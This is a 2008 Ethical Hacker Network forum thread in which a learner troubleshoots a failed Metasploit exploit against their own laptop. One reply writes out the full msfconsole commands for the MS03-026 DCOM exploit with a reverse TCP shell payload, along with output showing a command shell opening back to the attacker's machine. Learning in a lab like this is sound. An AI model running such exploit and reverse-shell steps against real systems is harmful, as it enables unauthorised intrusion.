HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 20 guests and 7 members online
EH-Net Donations

Enter Amount:
$
Google Ads
ChicagoCon 2008f
chicagocon2008f_125x200banner.jpg
ChicagoCon 2008f
EH-Net News Feeds
Latest Additions
Book Recommendations



 
Advertisement

You are here: Home arrow Forum arrow Resourcesarrow Tutorialsarrow help with metaspoilt
Ethical Hacker Community Forums
September 05, 2008, 02:44:43 PM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Registration Now Open for ChicagoCon 2008f Oct 27 - Nov 2! Visit www.chicagocon.com.
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: help with metaspoilt  (Read 1818 times)
0 Members and 1 Guest are viewing this topic.
cripton
Newbie
*
Offline Offline

Posts: 3


View Profile
« on: July 16, 2008, 02:35:41 AM »
Hello ..
                i have connected my laptop with pc and tryin out using exploits ...
when i execute an exploit i get an error          :-  "Exploit failed: Invalid
packet. Packet header must be at least 10 bytes long"


can any one tell me how to change the size of the header???
Logged
apollo
Newbie
*
Offline Offline

Posts: 22


View Profile
« Reply #1 on: July 17, 2008, 08:08:46 PM »
I'm not sure that it's the size of your header that is the problem.  I'd be interested more in what you are trying to do when you get this error message.  Looking up that error message, it seems to be from the dcerpc package, so I'm guessing that it might be the dcom exploit but if you can tell us the commands that you ran within metasploit to get the error, then we can maybe help you troubleshoot the problem better.
Logged
ChrisG
EH-Net Columnist
Hero Member
*****
Offline Offline

Posts: 981


View Profile WWW
« Reply #2 on: July 18, 2008, 06:45:32 AM »
to echo apollo

what commands and options did you run?

what OS are you running?

what OS and SP is your target?

did you select the appropriate target inside of MSF?
Logged
...tests i took go here...

http://carnal0wnage.blogspot.com/
cripton
Newbie
*
Offline Offline

Posts: 3


View Profile
« Reply #3 on: July 18, 2008, 02:16:03 PM »
Quote from: apollo on July 17, 2008, 08:08:46 PM
I'm not sure that it's the size of your header that is the problem.  I'd be interested more in what you are trying to do when you get this error message.  Looking up that error message, it seems to be from the dcerpc package, so I'm guessing that it might be the dcom exploit but if you can tell us the commands that you ran within metasploit to get the error, then we can maybe help you troubleshoot the problem better.






Well i m using a GUI metasploit in which :

1. selected exploit/windows/dcerpc/ms03_026_dcom
2.  Target is my laptop which has xp sp 2
3.  payload used is Windows/shell_reverse_tcp
4.  rhost is set to laptop IP

after i apply the exploit i m getting:-

22:07:55 - ms03_026_dcom
  • Launching exploit windows/dcerpc/ms03_026_dcom...
22:07:56 - ms03_026_dcom
  • Started reverse handler
22:07:56 - ms03_026_dcom
  • Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
22:07:56 - ms03_026_dcom
  • Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.1[135] ...
22:07:56 - ms03_026_dcom [-] Exploit failed: Invalid packet. Packet header must be at least 10 bytes long


My pc has xp sp 2.. 
Logged
apollo
Newbie
*
Offline Offline

Posts: 22


View Profile
« Reply #4 on: July 18, 2008, 03:06:21 PM »
I'm guessing that the host may not be vulnerable and that the reaction based off of the data received from the host you were trying to exploit is what is getting reported on based on the fact that the code which produces that error lives in both the client and the listener for the dcerpc stuff.  You may want to try the console though in case there is something else amiss.  Try this:
Everywhere that is <your IP> is the host running metasploit
Everywhere that is <target IP> is the host that you want to exploit

Code:
msfconsole

then

msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set target 0
target => 0
msf exploit(ms03_026_dcom) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(ms03_026_dcom) > set lhost <your IP>
lhost => <your IP>
msf exploit(ms03_026_dcom) > set rhost <target IP>
rhost => <target IP>
msf exploit(ms03_026_dcom) > exploit
[*] Started reverse handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:<target IP>[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:<target IP>[135] ...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (<your IP>:4444 -> <target IP>:1095)
msf exploit(ms03_026_dcom) >



That should work if the host is vulnerable, you may have to try a few times, sometimes certain exploits don't work 100% of the time, and sometimes they partially work. 
Logged
Kev
Sr. Member
****
Offline Offline

Posts: 310


View Profile
« Reply #5 on: July 18, 2008, 03:20:53 PM »
ms03_026_dcom on XP sp2 ?  Its not vulnerable.
Logged
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.143 seconds with 23 queries.
 
Polls
Best for daily desktop use:
 
Support EH-Net
chicagocon2008f_125x200banner.jpg
ChicagoCon 2008f

Support EH-Net by
Buying all of your
Amazon items using
the search bar above.
cbtnuggets_logo_125.jpg
Try CBT Nuggets Free!
Recent Forum Topics
Vote For EH-Net

progenic.com
Click here to Vote!

Sadikhov.com
Top IT Cert Sites

binarica.com
Binarica Logo

Add to Technorati Favorites
technorati fave

chicagocon2008f_125x200banner.jpg
ChicagoCon 2008f
 
         
Advertisement

© 2008 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.